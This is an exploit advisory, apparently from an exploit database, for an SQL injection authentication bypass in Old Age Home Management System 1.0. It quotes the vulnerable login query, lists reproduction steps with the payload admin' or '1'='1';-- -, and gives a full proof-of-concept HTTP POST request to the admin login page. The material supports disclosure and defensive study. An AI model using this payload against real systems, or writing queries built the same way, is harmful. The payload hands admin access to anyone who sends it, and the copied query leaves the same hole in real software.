Old Age Home Management System 1.0 SQL Injection

2022.06.20
Credit: twseptian
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass # Date: 12/06/2022 # Exploit Author: twseptian # Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip # Version: v1.0 # Tested on: Kali Linux # Vulnerable code line 9 in file "/oahms/admin/login.php" $ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'"); # Steps of reproduce: 1. Go to the admin login page http://localhost/oahms/admin/login.php 2. sqli payload: admin' or '1'='1';-- - 3. password: password # Proof of Concept POST /oahms/admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/oahms/admin/login.php Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top